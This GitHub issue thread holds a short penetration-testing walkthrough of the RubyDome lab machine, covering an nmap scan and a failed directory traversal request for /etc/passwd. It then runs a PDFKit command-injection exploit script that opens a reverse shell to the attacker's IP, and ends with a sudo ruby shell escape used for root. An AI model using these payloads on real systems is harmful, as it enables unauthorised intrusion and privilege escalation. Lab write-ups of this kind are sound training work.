WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

RubyDome (easy, linux, 2023) -- PDFKit #22

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Key points:

WDavid404 commented 4 months ago
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)

3000/tcp open  http    syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF

WEBrick httpd 1.7.0 --> https://www.exploit-db.com/exploits/5215 (Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal) --> version info doesn:t match. Try it (http://192.168.218.22:3000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd) --> doesn't work...

On 3000/tcp web page, Input http://127.0.0.1 image ---> image

Search PDFKit exploit --> https://www.exploit-db.com/exploits/51293 (pdfkit v0.8.7.2 - Command Injection)

We don't know PDFKit version, but try it.. python3 51293.py -s 192.168.45.180 80 -w http://192.168.218.22:3000/pdf -p url (From burpsuite, we know the URL is /pdf not /pdf/ and "-p (parameter)" should be "url" ) image

--> work! image image

PE:

sudo -l --> image

According to https://gtfobins.github.io/gtfobins/ruby/#sudo

echo 'exec "/bin/sh"'>/home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb

image